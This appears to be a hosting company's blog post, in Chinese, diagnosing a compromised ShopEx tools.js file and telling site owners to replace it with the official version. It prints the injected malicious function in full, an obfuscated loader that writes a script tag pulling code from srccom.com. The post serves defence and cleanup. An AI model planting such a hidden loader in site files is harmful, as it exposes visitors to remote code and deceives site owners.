大家都知道shopex是一款開源的程序。很多做電商的站長的朋友們都是使用的這個開源程序。但是開源的程序有很多bug，黑客就是瞅準(zhǔn)了這些漏洞進(jìn)行攻擊。其中有一種，攻擊的對象就是js文件。今天小編就遇到了一個站長朋友的網(wǎng)站受到這樣的攻擊。js文件里包含了惡意代碼，從而觸發(fā)了惡意訪問請求。 無憂主機(jī)小編在分析客戶網(wǎng)站訪問時，發(fā)現(xiàn)網(wǎng)站加載特別慢，原因是加載了以下鏈接： srccom.com/SRC.SRC 而這個鏈接，單獨(dú)訪問是無法訪問的。也就是說由于這個無法訪問的鏈接程序一直在進(jìn)行調(diào)用，但是調(diào)用失敗出現(xiàn)pending響應(yīng)返回，導(dǎo)致加載緩慢。根據(jù)鏈接調(diào)用分析，報錯來自于tools.js文件。粗略查看程序發(fā)現(xiàn)tools.js中并沒有惡意URL的關(guān)鍵字。無憂主機(jī)小編把客戶的tools.js文件下載到本地，仔細(xì)對比shopex開源源碼的tools.js，發(fā)現(xiàn)文件中被植入了一段惡意函數(shù)，函數(shù)代碼如下：

function CurrentXmlFrmFocus(){

var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];

var arsOffset=[" ",":",".","/","<",">","=","'","CRS","MOC","TPIRCS","PTTH"];

var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];

var strgAttribute=”";

ardPopOpacity=ardPopOpacity.concat(arnElement);

for(var i=0;i<ardPopOpacity.length;i++) strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split(“”).reverse().join(“”);

document.writeln(strgAttribute);

}

具體的解決方案如下： 找到網(wǎng)站根目錄下的statics/script/tools.js文件，使用shopex最新安裝包中的JS文件上傳替換它！   按照以上發(fā)法替換后，到網(wǎng)站后臺更新下緩存就可以解決。最近shopex中此問題爆發(fā)比較頻繁，希望此文能引起shopex站長們的重視，也希望這篇技術(shù)文章能幫到遇到同樣問題的站長們。 相關(guān)文章推薦閱讀： 解決SHOPEX添加商品無法上傳商品圖片的方法 SHOPEX去除底部版權(quán)信息“POWERED BY SHOPEX V4.8.5 ” 解決SHOPEX打開網(wǎng)頁一直加載EC.PINGTCSS.QQ.COM的方法 ?  

本文地址：http://www.gle-technology.com/shopex/13741.html

上一篇: phpcmsV9網(wǎng)站后臺取消后臺驗(yàn)證碼方法
下一篇: Joomla3.2偽靜態(tài)開啟方法！2014最新版joomla偽靜態(tài)配置教程